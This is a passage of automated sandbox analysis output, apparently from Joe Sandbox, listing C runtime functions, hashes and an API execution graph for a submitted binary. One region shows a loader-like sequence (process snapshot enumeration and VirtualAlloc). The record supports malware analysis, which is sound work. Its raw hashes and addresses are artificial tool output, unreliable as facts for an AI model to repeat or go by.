                                                                                                                                    • Instruction Fuzzy Hash: B101667790020ACFCB15EF42E4C54D9B772FB8A3487040AACDA125B416F3316226C755
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __CreateFrameInfo.LIBCMT ref: 0040C7C3
                                                                                                                                      • Part of subcall function 0040969C: __getptd.LIBCMT ref: 004096AA
                                                                                                                                      • Part of subcall function 0040969C: __getptd.LIBCMT ref: 004096B8
                                                                                                                                    • __getptd.LIBCMT ref: 0040C7CD
                                                                                                                                      • Part of subcall function 0040DAAC: __getptd_noexit.LIBCMT ref: 0040DAAF
                                                                                                                                      • Part of subcall function 0040DAAC: __amsg_exit.LIBCMT ref: 0040DABC
                                                                                                                                    • __getptd.LIBCMT ref: 0040C7DB
                                                                                                                                    • __getptd.LIBCMT ref: 0040C7E9
                                                                                                                                    • __getptd.LIBCMT ref: 0040C7F4
                                                                                                                                      • Part of subcall function 00409741: __CallSettingFrame@12.LIBCMT ref: 0040978D
                                                                                                                                      • Part of subcall function 0040C8C1: __getptd.LIBCMT ref: 0040C8D0
                                                                                                                                      • Part of subcall function 0040C8C1: __getptd.LIBCMT ref: 0040C8DE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3282538202-0
                                                                                                                                    • Opcode ID: 58829906fccc47d1afc6fe36f00f2806a0917cb6f702481791e4a4fe6ba88cc5
                                                                                                                                    • Instruction ID: 09d91c7a99a94a76a3c0ae50bfc6239322f6f666cb573b467186e509e9e55391
                                                                                                                                    • Opcode Fuzzy Hash: 58829906fccc47d1afc6fe36f00f2806a0917cb6f702481791e4a4fe6ba88cc5
                                                                                                                                    • Instruction Fuzzy Hash: 281107B5D14209DFDB00EFA5C445AEDBBB0FF08314F10856AF814A7292DB3C9A159F58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                    • Instruction ID: f39249174786bfb3997e1d9ca9cdd7fd6067facab53a56023d8081d1df6d1223
                                                                                                                                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                    • Instruction Fuzzy Hash: 5F11427200014DBBCF225E85CC51CEE3F72BB18354B588436FA1865971D33AD976AF85
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __getptd.LIBCMT ref: 0040B698
                                                                                                                                      • Part of subcall function 0040DAAC: __getptd_noexit.LIBCMT ref: 0040DAAF
                                                                                                                                      • Part of subcall function 0040DAAC: __amsg_exit.LIBCMT ref: 0040DABC
                                                                                                                                    • __getptd.LIBCMT ref: 0040B6AF
                                                                                                                                    • __amsg_exit.LIBCMT ref: 0040B6BD
                                                                                                                                    • __lock.LIBCMT ref: 0040B6CD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3521780317-0
                                                                                                                                    • Opcode ID: 030a6faa8dc23f1d04d2e73f61af8dff6a69edb1d44e77cd1fb327a71068fd8d
                                                                                                                                    • Instruction ID: e6d89918f8d0bbb2e059844e9a28553fc9d99d8ea96064865f53a3dffa5fdaa2
                                                                                                                                    • Opcode Fuzzy Hash: 030a6faa8dc23f1d04d2e73f61af8dff6a69edb1d44e77cd1fb327a71068fd8d
                                                                                                                                    • Instruction Fuzzy Hash: D2F01231A147148AE721BBAA8403B5A73A0BF44724F144A7FE840B73E2CB7D5945DF9E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __getptd.LIBCMT ref: 0040C547
                                                                                                                                      • Part of subcall function 0040DAAC: __getptd_noexit.LIBCMT ref: 0040DAAF
                                                                                                                                      • Part of subcall function 0040DAAC: __amsg_exit.LIBCMT ref: 0040DABC
                                                                                                                                    • __CallSettingFrame@12.LIBCMT ref: 0040C597
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CallFrame@12Setting__amsg_exit__getptd__getptd_noexit
                                                                                                                                    • String ID: j
                                                                                                                                    • API String ID: 4140145597-2137352139
                                                                                                                                    • Opcode ID: 09c3eb2309c6003fe2766fb35f8ca4d53946a33882809f710a1381a4c50d3b13
                                                                                                                                    • Instruction ID: a07b0148010ffb41941af26e977760d19f40225d1c75b4db935f1a8cc6657857
                                                                                                                                    • Opcode Fuzzy Hash: 09c3eb2309c6003fe2766fb35f8ca4d53946a33882809f710a1381a4c50d3b13
                                                                                                                                    • Instruction Fuzzy Hash: 5611B271908261EFDB01DB55C89439CBB70AF06718F18829ED4647B1D3C33CA906CBC9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • ___BuildCatchObject.LIBCMT ref: 0040CB5B
                                                                                                                                      • Part of subcall function 0040CAB6: ___BuildCatchObjectHelper.LIBCMT ref: 0040CAEC
                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 0040CB72
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                                                                    • String ID: csm
                                                                                                                                    • API String ID: 3487967840-1018135373
                                                                                                                                    • Opcode ID: ec09eb294149d6937646b9702694b7f821a915241edb19366a771b096ad2dd0a
                                                                                                                                    • Instruction ID: 77b79d308bd03f6fe6b77b08083b8bc57d21ec3b332559c40ab3762e9ebcc8ba
                                                                                                                                    • Opcode Fuzzy Hash: ec09eb294149d6937646b9702694b7f821a915241edb19366a771b096ad2dd0a
                                                                                                                                    • Instruction Fuzzy Hash: BA01E871401109FBDF125F51DC86EAB7F6AEF08354F004126BD18251A1D73AA961DBA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __getptd.LIBCMT ref: 0040C8D0
                                                                                                                                      • Part of subcall function 0040DAAC: __getptd_noexit.LIBCMT ref: 0040DAAF
                                                                                                                                      • Part of subcall function 0040DAAC: __amsg_exit.LIBCMT ref: 0040DABC
                                                                                                                                    • __getptd.LIBCMT ref: 0040C8DE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                    • String ID: csm
                                                                                                                                    • API String ID: 803148776-1018135373
                                                                                                                                    • Opcode ID: 2eb4081df6688e28da712c9d30483c933f554a66997bba3c258df4051d7eceb3
                                                                                                                                    • Instruction ID: 7cb2c51281999ce0439b14148e4d5088595879aefd59f2f2206f8f3fb7e59fb7
                                                                                                                                    • Opcode Fuzzy Hash: 2eb4081df6688e28da712c9d30483c933f554a66997bba3c258df4051d7eceb3
                                                                                                                                    • Instruction Fuzzy Hash: A00128B4801205EACF38AF65C4946AEB7B5BF10311F544A7FE481762E1CB398D84DA9D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:3.4%
                                                                                                                                    Dynamic/Decrypted Code Coverage:6.3%
                                                                                                                                    Signature Coverage:5.8%
                                                                                                                                    Total number of Nodes:1489
                                                                                                                                    Total number of Limit Nodes:23
                                                                                                                                    execution_graph 11922 926000 11925 926026 11922->11925 11926 926035 11925->11926 11929 9267c6 11926->11929 11932 9267e1 11929->11932 11930 9267ea CreateToolhelp32Snapshot 11931 926806 Module32First 11930->11931 11930->11932 11933 926815 11931->11933 11934 926025 11931->11934 11932->11930 11932->11931 11936 926485 11933->11936 11937 9264b0 11936->11937 11938 9264c1 VirtualAlloc 11937->11938 11939 9264f9 11937->11939 11938->11939 11939->11939 11940 4121c6 11950 41214a 11940->11950 11943 4121f1 setSBCS 11967 40b33b 11943->11967 11945 4123a9 11946 412235 IsValidCodePage 11946->11943 11947 412247 GetCPInfo 11946->11947 11947->11943 11949 41225a _memset __setmbcp_nolock 11947->11949 11957 411f13 GetCPInfo 11949->11957 11975 40a140 11950->11975 11953 412187 11955 41218c GetACP 11953->11955 11956 412179 11953->11956 11954 412169 GetOEMCP 11954->11956 11955->11956 11956->11943 11956->11946 11956->11949 11959 411f47 _memset 11957->11959 11966 411ff9 11957->11966 12526 4129fe 11959->12526 11962 40b33b _CountryEnumProc@4 5 API calls 11964 4120a4 11962->11964 11964->11949 11965 40a56c ___crtLCMapStringA 100 API calls 11965->11966 11966->11962 11968 40b343 11967->11968 11969 40b345 IsDebuggerPresent 11967->11969 11968->11945 12671 40ecbc 11969->12671 11972 41325c SetUnhandledExceptionFilter UnhandledExceptionFilter 11973 413281 GetCurrentProcess TerminateProcess 11972->11973 11974 413279 __invoke_watson 11972->11974 11973->11945 11974->11973 11976 40a153 11975->11976 11982 40a1a0 11975->11982 11983 40dabc 11976->11983 11979 40a180 11979->11982 12003 4120a6 11979->12003 11982->11953 11982->11954 12019 40da43 GetLastError 11983->12019 11985 40dac4 11986 40a158 11985->11986 12033 40fcdf 11985->12033 11986->11979 11988 40b69c 11986->11988 11989 40b6a8 ___BuildCatchObject 11988->11989 11990 40dabc __getptd 65 API calls 11989->11990 11991 40b6ad 11990->11991 11992 40b6db 11991->11992 11993 40b6bf 11991->11993 11994 40dfcf __lock 65 API calls 11992->11994 11995 40dabc __getptd 65 API calls 11993->11995 11996 40b6e2 11994->11996 11997 40b6c4 11995->11997 12354 40b65e 11996->12354 12000 40b6d2 ___BuildCatchObject 11997->12000 12002 40fcdf __amsg_exit 65 API calls 11997->12002 12000->11979 12002->12000 12004 4120b2 ___BuildCatchObject 12003->12004 12005 40dabc __getptd 65 API calls 12004->12005 12006 4120b7 12005->12006 12007 40dfcf __lock 65 API calls 12006->12007 12008 4120c9 12006->12008 12009 4120e7 12007->12009 12010 4120d7 ___BuildCatchObject 12008->12010 12012 40fcdf __amsg_exit 65 API calls 12008->12012 12011 412130 12009->12011 12014 412118 InterlockedIncrement 12009->12014 12015 4120fe InterlockedDecrement 12009->12015 12010->11982 12522 412141 12011->12522 12012->12010 12014->12011 12015->12014 12016 412109 12015->12016 12016->12014 12017 4098aa __crtGetStringTypeA_stat 65 API calls 12016->12017 12018 412117 12017->12018 12018->12014 12040 40d8eb TlsGetValue 12019->12040 12022 40dab0 SetLastError 12022->11985 12027 40daa7 12077 4098aa 12027->12077 12028 40da8f 12059 40d95c 12028->12059 12031 40da97 GetCurrentThreadId 12031->12022 12032 40daad 12032->12022 12034 4103a4 __FF_MSGBANNER 65 API calls 12033->12034 12035 40fce9 12034->12035 12036 4101f9 __NMSG_WRITE 65 API calls 12035->12036 12037 40fcf1 12036->12037 12038 40d870 __decode_pointer 5 API calls 12037->12038 12039 40fcfc 12038->12039 12039->11986 12041 40d900 12040->12041 12042 40d91b 12040->12042 12043 40d870 __decode_pointer 5 API calls 12041->12043 12042->12022 12045 40affa 12042->12045 12044 40d90b TlsSetValue 12043->12044 12044->12042 12048 40b003 12045->12048 12047 40b040 12047->12022 12051 40d870 TlsGetValue 12047->12051 12048->12047 12049 40b021 Sleep 12048->12049 12090 412d38 12048->12090 12050 40b036 12049->12050 12050->12047 12050->12048 12052 40d888 12051->12052 12053 40d8a9 GetModuleHandleW 12051->12053 12052->12053 12054 40d892 TlsGetValue 12052->12054 12055 40d8b9 12053->12055 12058 40d8a1 12053->12058 12057 40d89d 12054->12057 12314 40fcaf 12055->12314 12057->12053 12057->12058 12058->12027 12058->12028 12318 40eac8 12059->12318 12061 40d968 GetModuleHandleW 12062 40d978 12061->12062 12063 40d97e 12061->12063 12064 40fcaf __crt_waiting_on_module_handle 2 API calls 12062->12064 12065 40d996 GetProcAddress GetProcAddress 12063->12065 12066 40d9ba 12063->12066 12064->12063 12065->12066 12067 40dfcf __lock 61 API calls 12066->12067 12068 40d9d9 InterlockedIncrement 12067->12068 12319 40da31 12068->12319 12071 40dfcf __lock 61 API calls 12072 40d9fa 12071->12072 12322 40b510 InterlockedIncrement 12072->12322 12074 40da18 12334 40da3a 12074->12334 12076 40da25 ___BuildCatchObject 12076->12031 12078 4098b6 ___BuildCatchObject 12077->12078 12079 40992f ___BuildCatchObject _realloc 12078->12079 12080 40dfcf __lock 63 API calls 12078->12080 12089 4098f5 12078->12089 12079->12032 12085 4098cd ___sbh_find_block 12080->12085 12081 40990a HeapFree 12081->12079 12082 40991c 12081->12082 12083 40b128 __cftof_l 63 API calls 12082->12083 12084 409921 GetLastError 12083->12084 12084->12079 12086 4098e7 12085->12086 12339 40e032 12085->12339 12346 409900 12086->12346 12089->12079 12089->12081 12091 412d44 ___BuildCatchObject 12090->12091 12092 412d5c 12091->12092 12102 412d7b _memset 12091->12102 12103 40b128 12092->12103 12095 412ded RtlAllocateHeap 12095->12102 12097 412d71 ___BuildCatchObject 12097->12048 12102->12095 12102->12097 12109 40dfcf 12102->12109 12116 40e7e1 12102->12116 12122 412e34 12102->12122 12125 40ddfb 12102->12125 12104 40da43 __getptd_noexit 65 API calls 12103->12104 12105 40b12d 12104->12105 12106 409a6f 12105->12106 12107 40d870 __decode_pointer 5 API calls 12106->12107 12108 409a7f __invoke_watson 12107->12108 12110 40dfe4 12109->12110 12111 40dff7 EnterCriticalSection 12109->12111 12128 40df0c 12110->12128 12111->12102 12113 40dfea 12113->12111 12114 40fcdf __amsg_exit 64 API calls 12113->12114 12115 40dff6 12114->12115 12115->12111 12117 40e80f 12116->12117 12118 40e8a8 12117->12118 12120 40e8b1 12117->12120 12302 40e348 12117->12302 12118->12120 12309 40e3f8 12118->12309 12120->12102 12313 40def5 LeaveCriticalSection 12122->12313 12124 412e3b 12124->12102 12126 40d870 __decode_pointer 5 API calls 12125->12126 12127 40de0b 12126->12127 12127->12102 12129 40df18 ___BuildCatchObject 12128->12129 12130 40df3e 12129->12130 12154 4103a4 12129->12154 12136 40df4e ___BuildCatchObject 12130->12136 12200 40afb5 12130->12200 12136->12113 12138 40df60 12141 40b128 __cftof_l 65 API calls 12138->12141 12139 40df6f 12142 40dfcf __lock 65 API calls 12139->12142 12141->12136 12143 40df76 12142->12143 12144 40dfaa 12143->12144 12145 40df7e 12143->12145 12147 4098aa __crtGetStringTypeA_stat 65 API calls 12144->12147 12206 4161d2 12145->12206 12149 40df9b 12147->12149 12148 40df89 12148->12149 12150 4098aa __crtGetStringTypeA_stat 65 API calls 12148->12150 12210 40dfc6 12149->12210 12152 40df95 12150->12152 12153 40b128 __cftof_l 65 API calls 12152->12153 12153->12149 12213 41843c 12154->12213 12156 4103ab 12157 4103b8 12156->12157 12158 41843c __set_error_mode 65 API calls 12156->12158 12159 4101f9 __NMSG_WRITE 65 API calls 12157->12159 12161 40df2d 12157->12161 12158->12157 12160 4103d0 12159->12160 12162 4101f9 __NMSG_WRITE 65 API calls 12160->12162 12163 4101f9 12161->12163 12162->12161 12164 41020d 12163->12164 12165 41843c __set_error_mode 62 API calls 12164->12165 12196 40df34 12164->12196 12166 41022f 12165->12166 12167 41036d GetStdHandle 12166->12167 12168 41843c __set_error_mode 62 API calls 12166->12168 12169 41037b _strlen 12167->12169 12167->12196 12170 410240 12168->12170 12172 410394 WriteFile 12169->12172 12169->12196 12170->12167 12171 410252 12170->12171 12171->12196 12219 40d20b 12171->12219 12172->12196 12175 410288 GetModuleFileNameA 12177 4102a6 12175->12177 12181 4102c9 _strlen 12175->12181 12179 40d20b _strcpy_s 62 API calls 12177->12179 12180 4102b6 12179->12180 12180->12181 12182 409947 __invoke_watson 10 API calls 12180->12182 12193 41030c 12181->12193 12235 413e98 12181->12235 12182->12181 12187 409947 __invoke_watson 10 API calls 12189 410330 12187->12189 12188 413e24 _strcat_s 62 API calls 12190 410344 12188->12190 12189->12188 12192 410355 12190->12192 12194 409947 __invoke_watson 10 API calls 12190->12194 12191 409947 __invoke_watson 10 API calls 12191->12193 12253 4182d3 12192->12253 12244 413e24 12193->12244 12194->12192 12197 40fd33 12196->12197 12280 40fd08 GetModuleHandleW 12197->12280 12203 40afbe 12200->12203 12202 40aff4 12202->12138 12202->12139 12203->12202 12204 40afd5 Sleep 12203->12204 12282 40d2c2 12203->12282 12205 40afea 12204->12205 12205->12202 12205->12203 12300 40eac8 12206->12300 12208 4161de InitializeCriticalSectionAndSpinCount 12209 416222 ___BuildCatchObject 12208->12209 12209->12148 12301 40def5 LeaveCriticalSection 12210->12301 12212 40dfcd 12212->12136 12214 41844b 12213->12214 12215 418455 12214->12215 12216 40b128 __cftof_l 65 API calls 12214->12216 12215->12156 12217 41846e 12216->12217 12218 409a6f __cftof_l 5 API calls 12217->12218 12218->12215 12220 40d21c 12219->12220 12222 40d223 12219->12222 12220->12222 12226 40d249 12220->12226 12221 40b128 __cftof_l 65 API calls 12223 40d228 12221->12223 12222->12221 12224 409a6f __cftof_l 5 API calls 12223->12224 12225 40d237 12224->12225 12225->12175 12228 409947 12225->12228 12226->12225 12227 40b128 __cftof_l 65 API calls 12226->12227 12227->12223 12229 409ab0 _memset 12228->12229 12230 409974 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12229->12230 12231 409a50 GetCurrentProcess TerminateProcess 12230->12231 12232 409a44 __invoke_watson 12230->12232 12233 40b33b _CountryEnumProc@4 5 API calls 12231->12233 12232->12231 12234 409a6d 12233->12234 12234->12175 12240 413eaa 12235->12240 12236 413eae 12237 40b128 __cftof_l 65 API calls 12236->12237 12238 4102f9 12236->12238 12239 413eca 12237->12239 12238->12191 12238->12193 12241 409a6f __cftof_l 5 API calls 12239->12241 12240->12236 12240->12238 12242 413ef4 12240->12242 12241->12238 12242->12238 12243 40b128 __cftof_l 65 API calls 12242->12243 12243->12239 12245 413e3c 12244->12245 12248 413e35 12244->12248 12246 40b128 __cftof_l 65 API calls 12245->12246 12247 413e41 12246->12247 12249 409a6f __cftof_l 5 API calls 12247->12249 12248->12245 12250 413e70 12248->12250 12251 41031f 12249->12251 12250->12251 12252 40b128 __cftof_l 65 API calls 12250->12252 12251->12187 12251->12189 12252->12247 12254 40d867 _doexit 6 API calls 12253->12254 12255 4182e3 12254->12255 12256 4182f6 LoadLibraryA 12255->12256 12258 41837e 12255->12258 12257 41830b GetProcAddress 12256->12257 12270 418420 12256->12270 12259 418321 12257->12259 12257->12270 12262 40d870 __decode_pointer 5 API calls 12258->12262 12277 4183a8 12258->12277 12263 40d7f5 __encode_pointer 6 API calls 12259->12263 12260 40d870 __decode_pointer 5 API calls 12260->12270 12261 40d870 __decode_pointer 5 API calls 12271 4183eb 12261->12271 12264 41839b 12262->12264 12265 418327 GetProcAddress 12263->12265 12266 40d870 __decode_pointer 5 API calls 12264->12266 12267 40d7f5 __encode_pointer 6 API calls 12265->12267 12266->12277 12268 41833c GetProcAddress 12267->12268 12269 40d7f5 __encode_pointer 6 API calls 12268->12269 12272 418351 GetProcAddress 12269->12272 12270->12196 12274 40d870 __decode_pointer 5 API calls 12271->12274 12276 4183d3 12271->12276 12273 40d7f5 __encode_pointer 6 API calls 12272->12273 12275 418366 12273->12275 12274->12276 12275->12258 12278 418370 GetProcAddress 12275->12278 12276->12260 12277->12261 12277->12276 12279 40d7f5 __encode_pointer 6 API calls 12278->12279 12279->12258 12281 40fd1c ExitProcess 12280->12281 12283 40d375 12282->12283 12293 40d2d4 12282->12293 12284 40ddfb _realloc 5 API calls 12283->12284 12285 40d37b 12284->12285 12286 40b128 __cftof_l 64 API calls 12285->12286 12299 40d36d 12286->12299 12287 4103a4 __FF_MSGBANNER 64 API calls 12291 40d2e5 12287->12291 12288 4101f9 __NMSG_WRITE 64 API calls 12288->12291 12289 40d273 _malloc 64 API calls 12289->12293 12290 40d331 RtlAllocateHeap 12290->12293 12291->12287 12291->12288 12292 40fd33 _fast_error_exit GetModuleHandleW ExitProcess 12291->12292 12291->12293 12292->12291 12293->12289 12293->12290 12293->12291 12294 40d361 12293->12294 12295 40ddfb _realloc 5 API calls 12293->12295 12297 40d366 12293->12297 12293->12299 12296 40b128 __cftof_l 64 API calls 12294->12296 12295->12293 12296->12297 12298 40b128 __cftof_l 64 API calls 12297->12298 12298->12299 12299->12203 12300->12208 12301->12212 12303 40e35b HeapReAlloc 12302->12303 12304 40e38f HeapAlloc 12302->12304 12305 40e379 12303->12305 12306 40e37d 12303->12306 12304->12305 12307 40e3b2 VirtualAlloc 12304->12307 12305->12118 12306->12304 12307->12305 12308 40e3cc HeapFree 12307->12308 12308->12305 12310 40e40f VirtualAlloc 12309->12310 12312 40e456 12310->12312 12312->12120 12313->12124 12315 40fcba Sleep GetModuleHandleW 12314->12315 12316 40fcd8 12315->12316 12317 40fcdc 12315->12317 12316->12315 12316->12317 12317->12058 12318->12061 12337 40def5 LeaveCriticalSection 12319->12337 12321 40d9f3 12321->12071 12323 40b531 12322->12323 12324 40b52e InterlockedIncrement 12322->12324 12325 40b53b InterlockedIncrement 12323->12325 12326 40b53e 12323->12326 12324->12323 12325->12326 12327 40b548 InterlockedIncrement 12326->12327 12328 40b54b 12326->12328 12327->12328 12329 40b555 InterlockedIncrement 12328->12329 12331 40b558 12328->12331 12329->12331 12330 40b571 InterlockedIncrement 12330->12331 12331->12330 12332 40b581 InterlockedIncrement 12331->12332 12333 40b58c InterlockedIncrement 12331->12333 12332->12331 12333->12074 12338 40def5 LeaveCriticalSection 12334->12338 12336 40da41 12336->12076 12337->12321 12338->12336 12340 40e071 12339->12340 12341 40e313 12339->12341 12340->12341 12342 40e25d VirtualFree 12340->12342 12341->12086 12343 40e2c1 12342->12343 12343->12341 12344 40e2d0 VirtualFree HeapFree 12343->12344 12349 40d490 12344->12349 12353 40def5 LeaveCriticalSection 12346->12353 12348 409907 12348->12089 12350 40d4a8 12349->12350 12351 40d4d7 12350->12351 12352 40d4cf __VEC_memcpy 12350->12352 12351->12341 12352->12351 12353->12348 12355 40b662 12354->12355 12361 40b694 12354->12361 12356 40b510 ___addlocaleref 8 API calls 12355->12356 12355->12361 12357 40b675 12356->12357 12357->12361 12365 40b59f 12357->12365 12362 40b706 12361->12362 12521 40def5 LeaveCriticalSection 12362->12521 12364 40b70d 12364->11997 12366 40b5b0 InterlockedDecrement 12365->12366 12367 40b633 12365->12367 12368 40b5c5 InterlockedDecrement 12366->12368 12369 40b5c8 12366->12369 12367->12361 12379 40b3c7 12367->12379 12368->12369 12370 40b5d2 InterlockedDecrement 12369->12370 12371 40b5d5 12369->12371 12370->12371 12372 40b5e2 12371->12372 12373 40b5df InterlockedDecrement 12371->12373 12374 40b5ec InterlockedDecrement 12372->12374 12376 40b5ef 12372->12376 12373->12372 12374->12376 12375 40b608 InterlockedDecrement 12375->12376 12376->12375 12377 40b618 InterlockedDecrement 12376->12377 12378 40b623 InterlockedDecrement 12376->12378 12377->12376 12378->12367 12385 40b3de 12379->12385 12408 40b44b 12379->12408 12380 40b498 12399 40b4bf 12380->12399 12433 4136b0 12380->12433 12381 4098aa __crtGetStringTypeA_stat 65 API calls 12382 40b46c 12381->12382 12386 4098aa __crtGetStringTypeA_stat 65 API calls 12382->12386 12384 40b412 12387 40b433 12384->12387 12398 4098aa __crtGetStringTypeA_stat 65 API calls 12384->12398 12385->12384 12393 4098aa __crtGetStringTypeA_stat 65 API calls 12385->12393 12385->12408 12389 40b47f 12386->12389 12390 4098aa __crtGetStringTypeA_stat 65 API calls 12387->12390 12396 4098aa __crtGetStringTypeA_stat 65 API calls 12389->12396 12400 40b440 12390->12400 12391 40b504 12394 4098aa __crtGetStringTypeA_stat 65 API calls 12391->12394 12392 4098aa __crtGetStringTypeA_stat 65 API calls 12392->12399 12395 40b407 12393->12395 12401 40b50a 12394->12401 12409 413acd 12395->12409 12403 40b48d 12396->12403 12397 4098aa 65 API calls __crtGetStringTypeA_stat 12397->12399 12404 40b428 12398->12404 12399->12391 12399->12397 12405 4098aa __crtGetStringTypeA_stat 65 API calls 12400->12405 12401->12361 12406 4098aa __crtGetStringTypeA_stat 65 API calls 12403->12406 12425 4138be 12404->12425 12405->12408 12406->12380 12408->12380 12408->12381 12410 413ada 12409->12410 12424 413b57 12409->12424 12412 4098aa __crtGetStringTypeA_stat 65 API calls 12410->12412 12413 413aeb 12410->12413 12411 413afd 12415 413b0f 12411->12415 12416 4098aa __crtGetStringTypeA_stat 65 API calls 12411->12416 12412->12413 12413->12411 12414 4098aa __crtGetStringTypeA_stat 65 API calls 12413->12414 12414->12411 12417 413b21 12415->12417 12418 4098aa __crtGetStringTypeA_stat 65 API calls 12415->12418 12416->12415 12419 413b33 12417->12419 12421 4098aa __crtGetStringTypeA_stat 65 API calls 12417->12421 12418->12417 12420 413b45 12419->12420 12422 4098aa __crtGetStringTypeA_stat 65 API calls 12419->12422 12423 4098aa __crtGetStringTypeA_stat 65 API calls 12420->12423 12420->12424 12421->12419 12422->12420 12423->12424 12424->12384 12426 4138cb 12425->12426 12432 4138ff 12425->12432 12427 4138db 12426->12427 12428 4098aa __crtGetStringTypeA_stat 65 API calls 12426->12428 12429 4098aa __crtGetStringTypeA_stat 65 API calls 12427->12429 12431 4138ed 12427->12431 12428->12427 12429->12431 12430 4098aa __crtGetStringTypeA_stat 65 API calls 12430->12432 12431->12430 12431->12432 12432->12387 12434 4136c1 12433->12434 12435 40b4b8 12433->12435 12436 4098aa __crtGetStringTypeA_stat 65 API calls 12434->12436 12435->12392 12437 4136c9 12436->12437 12438 4098aa __crtGetStringTypeA_stat 65 API calls 12437->12438 12439 4136d1 12438->12439 12440 4098aa __crtGetStringTypeA_stat 65 API calls 12439->12440 12441 4136d9 12440->12441 12442 4098aa __crtGetStringTypeA_stat 65 API calls 12441->12442 12443 4136e1 12442->12443 12444 4098aa __crtGetStringTypeA_stat 65 API calls 12443->12444 12445 4136e9 12444->12445 12446 4098aa __crtGetStringTypeA_stat 65 API calls 12445->12446 12447 4136f1 12446->12447 12448 4098aa __crtGetStringTypeA_stat 65 API calls 12447->12448 12449 4136f8 12448->12449 12450 4098aa __crtGetStringTypeA_stat 65 API calls 12449->12450 12451 413700 12450->12451 12452 4098aa __crtGetStringTypeA_stat 65 API calls 12451->12452 12453 413708 12452->12453 12454 4098aa __crtGetStringTypeA_stat 65 API calls 12453->12454 12455 413710 12454->12455 12456 4098aa __crtGetStringTypeA_stat 65 API calls 12455->12456 12457 413718 12456->12457 12458 4098aa __crtGetStringTypeA_stat 65 API calls 12457->12458 12459 413720 12458->12459 12460 4098aa __crtGetStringTypeA_stat 65 API calls 12459->12460 12461 413728 12460->12461 12462 4098aa __crtGetStringTypeA_stat 65 API calls 12461->12462 12463 413730 12462->12463 12464 4098aa __crtGetStringTypeA_stat 65 API calls 12463->12464 12465 413738 12464->12465 12466 4098aa __crtGetStringTypeA_stat 65 API calls 12465->12466 12467 413740 12466->12467 12468 4098aa __crtGetStringTypeA_stat 65 API calls 12467->12468 12469 41374b 12468->12469 12470 4098aa __crtGetStringTypeA_stat 65 API calls 12469->12470 12471 413753 12470->12471 12472 4098aa __crtGetStringTypeA_stat 65 API calls 12471->12472 12473 41375b 12472->12473 12474 4098aa __crtGetStringTypeA_stat 65 API calls 12473->12474 12475 413763 12474->12475 12476 4098aa __crtGetStringTypeA_stat 65 API calls 12475->12476 12477 41376b 12476->12477 12478 4098aa __crtGetStringTypeA_stat 65 API calls 12477->12478 12479 413773 12478->12479 12480 4098aa __crtGetStringTypeA_stat 65 API calls 12479->12480 12481 41377b 12480->12481 12482 4098aa __crtGetStringTypeA_stat 65 API calls 12481->12482 12483 413783 12482->12483 12484 4098aa __crtGetStringTypeA_stat 65 API calls 